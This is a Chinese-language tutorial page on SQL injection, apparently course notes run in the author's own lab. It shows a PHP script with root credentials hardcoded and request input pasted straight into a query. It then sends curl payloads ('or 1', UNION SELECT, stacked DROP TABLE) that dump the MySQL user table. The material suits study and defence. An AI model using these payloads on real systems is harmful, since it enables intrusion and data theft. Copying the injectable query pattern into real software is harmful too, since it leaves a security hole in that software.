next up previous contents
Next: SQL injection 實例 Up: SQL Injection 注入 Previous: 前言   Contents   DYWANG_HOME

SQL 注入查詢

  1. 範例:查詢使用者帳號。以 $_GET['user'] 函式取得在 php 網址後加入的 ?user=... 參數查詢,其中 MYSQL_NUM 指定使用數字索引。
    [root@kvm8 ~]# cat /var/www/html/injection.php
    $dbhost = 'localhost:3306';
    $dbuser = 'root';
    $dbpass = '123qwe';
    $conn = mysqli_connect($dbhost, $dbuser, $dbpass) 
    	or die(mysqli_connect_error().PHP_EOL);
    mysqli_select_db( $conn, 'mysql' )
    	or die('Error: '.mysqli_error($conn).PHP_EOL);
    $sql = "SELECT host,user FROM user WHERE user={$_GET['user']}";
    $retval = mysqli_query( $conn,$sql )
    	or die('Error: '.mysqli_error($conn).PHP_EOL);
    while($row = mysqli_fetch_array($retval, MYSQLI_NUM)) {
        echo "HOST: {$row[0]}<br>User: {$row[1]}<br>".
        "--------------------------------<br>";
    }
    mysqli_free_result($retval);
    echo "Fetched data successfully\n";
    mysqli_close($conn); 
    ?>
    
  2. 在 php 網址後加入 ?user='root',查詢結果列出 host 及 user。
    [root@kvm8 ~]# curl -s http://kvm8.deyu.wang/injection.php?"user='root'" | sed 's/<br> */\n/g'
    HOST: 127.0.0.1
    User: root
    --------------------------------
    HOST: ::1
    User: root
    --------------------------------
    HOST: kvm8.deyu.wang
    User: root
    --------------------------------
    HOST: localhost
    User: root
    --------------------------------
    Fetched data successfully
    
  3. 在 php 網址後加入 ?user='a' or 1,查詢結果回應所有的帳號,範例中 %20 是空白,不能直接打空白建,否則 $_GET 會報錯。
    [root@kvm8 html]# curl -s http://kvm8.deyu.wang/injection.php?\
    "user='a'%20or%201" | sed 's/<br> */\n/g'
    HOST: 127.0.0.1
    User: root
    --------------------------------
    HOST: 192.168.122.1
    User: hosttest
    --------------------------------
    HOST: 192.168.122.1
    User: user2
    --------------------------------
    HOST: ::1
    User: root
    --------------------------------
    HOST: kvm8.deyu.wang
    User: root
    --------------------------------
    HOST: localhost
    User: dywang
    --------------------------------
    HOST: localhost
    User: root
    --------------------------------
    HOST: localhost
    User: user1
    --------------------------------
    HOST: localhost
    User: user3
    --------------------------------
    Fetched data successfully
    
  4. 在 php 網址後加入 ?user='a' union all select host,user from user,查詢結果列出所有 host 及 user,因為可以注入 union all .... 的條件。
    [root@kvm8 html]# curl -s http://kvm8.deyu.wang/injection.php?"user=\
    'a'%20union%20all%20select%20host,user%20from%20user" | sed 's/<br> */\n/g'
    HOST: 127.0.0.1
    User: root
    --------------------------------
    HOST: 192.168.122.1
    User: hosttest
    --------------------------------
    HOST: 192.168.122.1
    User: user2
    --------------------------------
    HOST: ::1
    User: root
    --------------------------------
    HOST: kvm8.deyu.wang
    User: root
    --------------------------------
    HOST: localhost
    User: dywang
    --------------------------------
    HOST: localhost
    User: root
    --------------------------------
    HOST: localhost
    User: user1
    --------------------------------
    HOST: localhost
    User: user3
    --------------------------------
    Fetched data successfully
    
  5. 在 php 網址後加入 ?user='a'; drop table user,查詢報錯,因為 PHP 的 mysqli_query 函式只接受單一詢問,加入分號來進行第二個詢問不被接受。
    [root@kvm8 html]# curl -s http://kvm8.deyu.wang/injection.php?\
    "user='a';drop%20table%20user"
    Error: You have an error in your SQL syntax; check the manual that corresponds
     to your MariaDB server version for the right syntax to use near
     'drop table user' at line 1
    



De-Yu Wang 2020-04-07